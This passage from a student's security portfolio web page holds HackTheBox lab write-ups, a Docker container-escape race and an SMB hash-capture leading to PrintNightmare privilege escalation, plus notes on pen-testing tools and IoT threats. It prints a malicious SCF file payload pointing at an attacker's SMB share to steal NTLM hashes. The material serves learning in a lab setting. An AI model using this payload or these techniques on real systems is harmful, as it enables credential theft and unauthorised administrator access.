                      "UpperDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/diff",
                      "WorkDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/work"
                   },
                   "Name":"overlay2"
                },
                "HostConfig":{
                   "AutoRemove":false,
                   "Binds":[
                      "/root/app/scripts/init.d:/docker-entrypoint-initdb.d:ro",
                      "app_vol_mysql:/var/lib/mysql:rw"
                   ],
                   "BlkioDeviceReadBps":null,
                   "BlkioDeviceReadIOps":null,
                   "BlkioDeviceWriteBps":null,
                   "BlkioDeviceWriteIOps":null,
                   "BlkioWeight":0,
                   "BlkioWeightDevice":null,
                   "CapAdd":[
                      "SYS_NICE"
                   ],
                   "CapDrop":null,
                   "Cgroup":"",
                   "CgroupParent":"",
                   "CgroupnsMode":"host",
                   "ConsoleSize":[
                      0,
                      0
                   ],
                   "ContainerIDFile":"",
                   "CpuCount":0,
                   "CpuPercent":0,
                   "CpuPeriod":0,
                   "CpuQuota":0,
                   "CpuRealtimePeriod":0,
                   "CpuRealtimeRuntime":0,
                   "CpuShares":0,
                   "CpusetCpus":"",
                   "CpusetMems":"",
                   "DeviceCgroupRules":null,
                   "DeviceRequests":null,
                   "Devices":null,
                   "Dns":null,
                   "DnsOptions":null,
                   "DnsSearch":null,
                   "ExtraHosts":null,
                   "GroupAdd":null,
                   "IOMaximumBandwidth":0,
                   "IOMaximumIOps":0,
                   "IpcMode":"private",
                   "Isolation":"",
                   "KernelMemory":0,
                   "KernelMemoryTCP":0,
                   "Links":null,
                   "LogConfig":{
                      "Config":{
          
                      },
                      "Type":"json-file"
                   },
                   "MaskedPaths":[
                      "/proc/asound",
                      "/proc/acpi",
                      "/proc/kcore",
                      "/proc/keys",
                      "/proc/latency_stats",
                      "/proc/timer_list",
                      "/proc/timer_stats",
                      "/proc/sched_debug",
                      "/proc/scsi",
                      "/sys/firmware"
                   ],
                   "Memory":0,
                   "MemoryReservation":0,
                   "MemorySwap":0,
                   "MemorySwappiness":null,
                   "NanoCpus":0,
                   "NetworkMode":"app_nw",
                   "OomKillDisable":false,
                   "OomScoreAdj":0,
                   "PidMode":"",
                   "PidsLimit":null,
                   "PortBindings":{
          
                   },
                   "Privileged":false,
                   "PublishAllPorts":false,
                   "ReadonlyPaths":[
                      "/proc/bus",
                      "/proc/fs",
                      "/proc/irq",
                      "/proc/sys",
                      "/proc/sysrq-trigger"
                   ],
                   "ReadonlyRootfs":false,
                   "RestartPolicy":{
                      "MaximumRetryCount":0,
                      "Name":"always"
                   },
                   "Runtime":"runc",
                   "SecurityOpt":null,
                   "ShmSize":67108864,
                   "UTSMode":"",
                   "Ulimits":null,
                   "UsernsMode":"",
                   "VolumeDriver":"",
                   "VolumesFrom":[
          
                   ]
                },
                "HostnamePath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hostname",
                "HostsPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hosts",
                "Id":"47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216",
                "Image":"sha256:5c62e459e087e3bd3d963092b58e50ae2af881076b43c29e38e2b5db253e0287",
                "LogPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216-json.log",
                "MountLabel":"",
                "Mounts":[
                   {
                      "Destination":"/docker-entrypoint-initdb.d",
                      "Mode":"ro",
                      "Propagation":"rprivate",
                      "RW":false,
                      "Source":"/root/app/scripts/init.d",
                      "Type":"bind"
                   },
                   {
                      "Destination":"/var/lib/mysql",
                      "Driver":"local",
                      "Mode":"rw",
                      "Name":"app_vol_mysql",
                      "Propagation":"",
                      "RW":true,
                      "Source":"/var/lib/docker/volumes/app_vol_mysql/_data",
                      "Type":"volume"
                   }
                ],
                "Name":"/mysql",
                "NetworkSettings":{
                   "Bridge":"",
                   "EndpointID":"",
                   "Gateway":"",
                   "GlobalIPv6Address":"",
                   "GlobalIPv6PrefixLen":0,
                   "HairpinMode":false,
                   "IPAddress":"",
                   "IPPrefixLen":0,
                   "IPv6Gateway":"",
                   "LinkLocalIPv6Address":"",
                   "LinkLocalIPv6PrefixLen":0,
                   "MacAddress":"",
                   "Networks":{
                      "app_nw":{
                         "Aliases":[
                            "47c78eb0450f",
                            "mysql"
                         ],
                         "DriverOpts":null,
                         "EndpointID":"50037fb137fd880f88a9efd17eb8cf94bf8142ec263080b4c904afeeaa79aa2e",
                         "Gateway":"172.18.0.1",
                         "GlobalIPv6Address":"",
                         "GlobalIPv6PrefixLen":0,
                         "IPAMConfig":{
                            "IPv4Address":"172.18.0.100"
                         },
                         "IPAddress":"172.18.0.100",
                         "IPPrefixLen":16,
                         "IPv6Gateway":"",
                         "Links":null,
                         "MacAddress":"02:42:ac:12:00:64",
                         "NetworkID":"021b24b8b3e1e3638463eeb7dc9af59c36cc412578cdf51931a24f04ea6f5532"
                      }
                   },
                   "Ports":{
                      "3306/tcp":null,
                      "33060/tcp":null
                   },
                   "SandboxID":"99cbb57fded2142e5dad46330b43249d2866f8514fb4342d06322f3e3b5c60f1",
                   "SandboxKey":"/var/run/docker/netns/99cbb57fded2",
                   "SecondaryIPAddresses":null,
                   "SecondaryIPv6Addresses":null
                },
                "Path":"docker-entrypoint.sh",
                "Platform":"linux",
                "ProcessLabel":"",
                "ResolvConfPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/resolv.conf",
                "RestartCount":0,
                "State":{
                   "Dead":false,
                   "Error":"",
                   "ExitCode":0,
                   "FinishedAt":"0001-01-01T00:00:00Z",
                   "Health":{
                      "FailingStreak":0,
                      "Log":[
                         {
                            "End":"2021-10-04T17:08:01.998027574+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:01.908189033+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:07.080804898+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:07.000613396+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:12.166584919+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:12.083845791+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:17.254375293+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:17.16894306+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:22.350400823+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:22.257747436+02:00"
                         }
                      ],
                      "Status":"healthy"
                   },
                   "OOMKilled":false,
                   "Paused":false,
                   "Pid":1108,
                   "Restarting":false,
                   "Running":true,
                   "StartedAt":"2021-10-04T06:57:47.409835076Z",
                   "Status":"running"
                }
             },
             "status":200
          }
                                          </code>
                                      </pre>
          <p>Looks like an username and some passwords lets try those with ssh.</p>
          <a href="img/portfolio/minor/red/htb_linux/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/UserFlag.png" alt=""></a>
          <p>We got the user flag! But now we need to find something to escalate our privileges. We
          could use LinPEAS to try and find something but we first have to get it on this
          machine.</p>
          <a href="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/WGETLinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETLinpeas.png" alt=""></a>
          <p>I used SimpleHTTPServer to get LinPeas from my machine to the target machine because the
          target machine didn't have access to the internet. Now we need to run LinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasMail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasMail.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png" alt=""></a>
          <p>Looks like LinPEAS found some interesting stuff like a mail message to Drew and the
          docker ip ranges and a docker folder that is edited regularly.</p>
          <a href="img/portfolio/minor/red/htb_linux/Mail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Mail.png" alt=""></a>
          <p>This probably means that the docker folder that gets edited regularly is the folder
          containing the game. And that some script is running that we could use.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>Looks like we got a public key as game-tester as well. Lets try to login into the docker
          ips using this public key.</p>
          <a href="img/portfolio/minor/red/htb_linux/Game-testerShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Game-testerShell.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png" alt=""></a>
          <p>And it worked now we got a shell as game-tester as well on a docker container. I noticed
          that the same docker folder on Drew also exists on the docker container and that they
          are shared. I also noticed that the docker folder get rewritten entirely so all files
          inside get removed and replaced before the server is restarted again. Lets see what the
          script does.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatNode-server.png" alt=""></a>
          <p>It runs in a folder called /usr/src/app which doesn't exist on the Drew user but it does
          on the game-tester container. So lets look at that as well.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatServerJS.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatServerJS.png" alt=""></a>
          <p>Look like we can crash the server if we make a POST to autoplay with a decimal instead of
          an integer. But that doesn't get us anywhere we need to infect the node-server.sh
          first.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>I found this <a href="https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout">website</a>
          explaining priv esc with docker so I gave it a try. But I have to be faster than the
          server can create the node-server.sh in order to infect it. So I created a script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RogueNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RogueNode-server.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/ExploitLoop.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitLoop.png" alt=""></a>
          <p>This should create a bash file in /tmp on the game-tester container that is executable by
          game-tester in order to priv esc. So lets crash the server and try it.</p>
          <a href="img/portfolio/minor/red/htb_linux/ExploitRun.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitRun.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/CrashGameServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CrashGameServer.png" alt=""></a>
          <p>I had to give it a few tries in order to succeed because in some cases the server was
          actually faster than my script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RootOnDocker.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootOnDocker.png" alt=""></a>
          <p>And it worked now we need to do the same thing in order to get root on the Drew machine
          but this time we don't have to worry about speed because we don't need to infect a
          script, we just have to do it fast enough before all the files inside the folder get
          deleted again.</p>
          <a href="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootFlag.png" alt=""></a>
          <p>That's it! We are root and got the flag!</p>
          <p>Although it took me quite a while to root this machine it was a really fun one.
          Containing a lot of different exploits mostly straight from the OWASP top 10 but also
          some I never heard of before like the docker priv esc.</p>
          <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal22" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Windows Write-up</p>
          <a href="img/portfolio/minor/red/htb_windows/DriverCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/DriverCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <a href="img/portfolio/minor/red/htb_windows/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/NMapOutput.png" alt=""></a>
          <p>When navigating to the webpage we are greeted by a login screen. After some searching and
          not finding anything useful I tried to login with just a default password admin:admin it
          was a longshot but it worked!</p>
          <a href="img/portfolio/minor/red/htb_windows/Dashboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/Dashboard.png" alt=""></a>
          <p>The only button that worked on the website was Firmware updates where you can upload a
          file. Knowing that SMB was also an open port I found this <a href="https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/">website</a>
          this could potentially it so lets try it out.
          </p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              [Shell]
                                              Command=2
                                              Iconfile=\\10.10.14.161\share\test.ico
                                              [Taskbar]
                                              Command=ToggleDesktop
                                          </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_windows/ResponderOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ResponderOutput.png" alt=""></a>
          <p>I created a payload like the example given on the site I found started responder and got
          a few hits. Now we know the username and maybe the password if we manage to crack
          it. We know from the responder output that it is a NTLM hash so lets put Hashcat on it
          and see what we'll get.</p>
          <a href="img/portfolio/minor/red/htb_windows/HashcatOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/HashcatOutput.png" alt=""></a>
          <p>Hashcat cracked the password with ease and now we can take a look at the SMB folder to
          see if we can find anything interesting.</p>
          <a href="img/portfolio/minor/red/htb_windows/SMBMap.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SMBMap.png" alt=""></a>
          <p>We didn't find anything interesting but knowing from the NMap output we also know that
          the RDP port is open so maybe it uses the same password.</p>
          <a href="img/portfolio/minor/red/htb_windows/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/UserFlag.png" alt=""></a>
          <p>This was indeed the case and now we already have the user flag. For priv esc running at
          least WinPEAS is a no-brainer. So I used SimpleHTTPServer to get WinPEAS on the target
          machine.</p>
          <a href="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/WgetWinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetWinpeas.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png" alt=""></a>
          <p>Really the only interesting thing WinPEAS found was a Print spooler process. After some
          Googling I stubled across <a href="https://github.com/calebstewart/CVE-2021-1675">this</a> CVE. So lets get
          that exploit on the target machine in the same way we did with WinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png" alt=""></a>
          <p>I wasn't able to run the script because of some permission issues, but after some
          Googling I found out I could just set the policy to unrestricted.</p>
          <a href="img/portfolio/minor/red/htb_windows/RunExploit.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RunExploit.png" alt=""></a>
          <p>I ran the exploit and it created a new administrator account for me with a username and
          password that I chose and know. Now the only thing that's left is just to logout as this
          user and login with our new user.</p>
          <a href="img/portfolio/minor/red/htb_windows/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RootFlag.png" alt=""></a>
          <p>And that's it! We have the root flag! This box wasn't that hard but still fun and
          sometimes challenging due to my lack of knowledge of Windows hacking. Overall a fun
          learning experience.</p>
          <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal24" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal25" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">My personal pen-testing toolboxes</p>
          <p>Like every other profession good tools make a world of difference on the quality and
          efficiency of the end product. This isn't any different with cyber security. Good tools
          can improve results providing you with more information and helping with getting to the
          results faster.</p>
          <h3>On the road</h3>
          <a href="img/portfolio/minor/red/kalilinux.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/kalilinux.jpg" alt=""></a>
          <p>On the road when I'm on my laptop I like to use Kali Linux. It's just convenient that it
          comes pre-loaded with all the tools you need, and it runs fairly lightweight on older
          laptops. The "kali-undercover" command is also a fun little gimmick that changes your
          Kali desktop to a Windows clone which for a random passer by looks just like a regular
          Windows machine. Making it incognito to use Kali whenever you're in a public space and
          want to keep a low profile.</p>
          <h3>At home</h3>
          <a href="img/portfolio/minor/red/parrotos.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/parrotos.jpg" alt=""></a>
          <p>At home on my main desktop PC I recently switched to natively running ParrotOS. This was
          because I liked to try something new and the reviews were good. It comes pre-loaded with
          the same tools as kali and a few extra tools like diverting all traffic trough tor
          making the machine even more anonymous. The user experience is a little better and just
          overall a good looking distro. This comes at a cost because it takes more resources to
          run. This isn't a problem on my PC because it's quite powerful and I don't have to think
          about battery life. Alongside ParrotOS I run a Windows VM in qemu with WinApps running
          on Linux which enables me to run any Windows application I want on Linux. I mostly use
          it for Microsoft Office products.</p>
          <h3>Cloud</h3>
          <a href="img/portfolio/minor/red/googlecloudconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/googlecloudconsole.PNG" alt=""></a>
          <p>Google cloud console is an awesome way to always have a Linux machine at your disposal
          where ever you are. It's fully cloud based and free to use. So when you're in need of a
          Linux terminal and you have access to a browser you're set. The only downside is that
          the machine is volatile so when you shut it down it is gone. This requires you to always
          re-install tools and such. Luckily due to it running on Google cloud it is pretty fast.
          Just overall a good tool to know about.</p>
          <a href="img/portfolio/minor/red/guacamole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamole.PNG" alt=""></a>
          <p>Now Guacamole is kinda like Google cloud console, but it's self-hosted. It can turn any
          machine with a SSH server into a cloud based web terminal accessible from any browser
          where ever you are. It takes a little time and effort to set it up but it is worth it.
          All the benefits from Google cloud console but your data is hosted by you and it is
          saved. In my case I installed Kali Linux on a docker server and now I can access it
          whenever I need to it doesn't matter if I'm on Windows, Linux or even my phone.</p>
          <a href="img/portfolio/minor/red/guacamoleconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamoleconsole.PNG" alt=""></a>
          <h3>Windows</h3>
          <a href="img/portfolio/minor/red/wsl.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/wsl.jpg" alt=""></a>
          <p>Whenever I'm using Windows and need to do a quick little task that requires Linux I don't
          want to reboot and boot into Linux because it's a hassle. That's when I use WSL. WSL
          stands for Windows Subsystem for Linux and it works great. It's not everything for
          example network related stuff is not possible due to WSL not having direct access to the
          network card but for other simple stuff it works great. And if I need to do a quick
          little scan I can use the Windows version of NMap. And if I need a little more
          functionality I can always use the before mentioned Guacamole to have instant access to
          a fully functional Kali instance in my browser.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal26" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Security of IOT protocols and technology</p>
          <p>Nowadays more and more people have their home filled with smart devices. Almost
          everything is smart in some way. Which creates new problems like security. These
          products weren't made with security in mind, on the contrary, they were made to be cheap
          and easy to use for people without IT knowledge.</p>
          <p>This causes IOT products to be, the most of the time, the weakest link in someones
          network. But IOT is here to stay and it is improving fast so let's take a look at some
          common security protocols.</p>
          <table>
          <tr>
          <th>Protocol</th>
          <th>Feature</th>
          <th>TCP/UDP</th>
          <th>Security</th>
          </tr>
          <tr>
          <td>LOWPAN</td>
          <td>WPANs to maintain an IPv6 network</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>MQTT</td>
          <td>To utilize the publish/subscribe pattern to provide transition flexibility and
          simplicity of implementation
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>AMQP</td>
          <td>To provide publish-subscribe and point-to point communication</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>CoAP</td>
          <td>To connect resource-constrained devices in a secure and reliable way</td>
          <td>UDP</td>
          <td>DTLS</td>
          </tr>
          <tr>
          <td>XMPP</td>
          <td>To transfer instant messaging (IM) standard that is used for multi-party
          chatting, voice and video calling and telepresence
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>DSS</td>
          <td>To enable scalable, real-time, dependable, high-performance and interoperable
          data exchanges using a publish–subscribe pattern
          </td>
          <td>TCP/UDP</td>
          <td>SSL</td>
          </tr>
          </table>
          <p>To show the security flaws in IOT devices</p>
          <table>
          <thead>
          <tr class="rowsep-1 valign-top">
          <th scope="col">Layers</th>
          <th scope="col">Attacks</th>
          <th scope="col">Issues</th>
          <th scope="col">Control Measures</th>
          </tr>
          </thead>
          <tbody>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Perception</td>
          <td class="align-left">Hardware Tempering</td>
          <td class="align-left">Data Leakage (Keys, Routing Tables, Etc)</td>
          <td class="align-left">Secure Physical Design</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Fake Node Injection</td>
          <td class="align-left">Fake Data Manipulation</td>
          <td class="align-left">Secure Booting</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Code Injection</td>
           <td class="align-left">Halt Transmission</td>
          <td class="align-left">Intrusion Detection Technology (IDT)</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sleep Denial Attack</td>
          <td class="align-left">Node Shutdown</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">WSN Node Jamming</td>
          <td class="align-left">Jam Node Communication</td>
          <td class="align-left">IPSec Security Channel</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RF Interference Of RFID</td>
          <td class="align-left">Distortion In Node Communication</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="12">Network</td>
          <td class="align-left">Traffic Analysis Attacks</td>
          <td class="align-left">Data Leakage (About Network)</td>
          <td class="align-left">Routing Security</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Spoofing</td>
          <td class="align-left">Intrusion In Network Data Manipulation</td>
          <td class="align-left">GPS Location System</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Unauthorized Access</td>
          <td class="align-left">Node Data Can Be Modified (Read, Write &amp; Delete)</td>
          <td class="align-left">Network Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sinkhole Attack</td>
          <td class="align-left">Data Leakage (Data Of The Nodes)</td>
          <td class="align-left">Security Aware Ad Hoc Routing</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Man In The Middle Attack</td>
          <td class="align-left">Data Privacy Violation</td>
          <td class="align-left">Point-To-Point Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Routing Information Attack</td>
          <td class="align-left">Routing Loops (Network Destruction)</td>
          <td class="align-left">Encrypting Routing Tables</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Application Security</td>
          <td class="align-left">Privacy Violation</td>
          <td class="align-left">Web Application Scanner</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Security</td>
           <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Homomorphic Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Underlying Infrastructure Security</td>
          <td class="align-left">Service Hijacking</td>
          <td class="align-left">Fragmentation Redundancy Scattering</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Third-Party Relationships</td>
          <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Shared Resources</td>
          <td class="align-left">Resources Destruction</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Virtualization Threats</td>
          <td class="align-left">Resources Theft</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Application</td>
          <td class="align-left">Phishing Attacks</td>
          <td class="align-left">Data Leakage (User Credentials Data)</td>
          <td class="align-left">Biometrics Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Virus, Worms, Trojan Horse, Spyware</td>
          <td class="align-left">Resource Destruction &amp; Hijacking</td>
